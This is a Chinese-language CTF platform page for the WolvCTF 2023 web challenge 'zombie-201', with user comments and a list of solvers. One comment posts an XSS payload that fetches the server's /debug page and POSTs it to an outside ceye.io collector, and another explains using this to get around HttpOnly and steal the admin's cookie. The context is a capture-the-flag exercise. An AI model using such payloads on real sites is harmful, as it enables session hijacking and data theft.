zombie-201WEB 未解决

分数: 0 金币: 0
所属赛事: WolvCTF 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 67
提  示:
描  述:
wctf{}
评论
15031597817 5天前

怎么做的?

回复 0

vincentshine 10月前

http://82.157.146.43:10973/zombie?show=<script>fetch('http://82.157.146.43:10973/debug').then(data => { fetch('http://xxxx.ceye.io',{method: 'POST', body: data}) })</script>

回复 0

justsosoloveyou 1年前

httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。

回复 7

WriteUp

image
zzhicecyb

0 金币

评分(0)

暂无评分

解题动态

luvwq 攻破了该题 3天前
Spring_LT 攻破了该题 7天前
inc1udeK 攻破了该题 17天前
Alenm 攻破了该题 17天前
lipton22 攻破了该题 26天前
Susen 攻破了该题 1月前
中年七叔 攻破了该题 1月前
divinesh 攻破了该题 1月前
Ch3ss 攻破了该题 1月前
菜鸟起飞 攻破了该题 1月前
miraiz 攻破了该题 2月前
cjydawn 攻破了该题 2月前
nuxe 攻破了该题 3月前
15008241322 攻破了该题 3月前
脆脆sha_ 攻破了该题 3月前
ting006 攻破了该题 5月前
max333 攻破了该题 6月前
yh1824159516 攻破了该题 6月前
王大炮 攻破了该题 6月前
iictfii 攻破了该题 7月前
问题反馈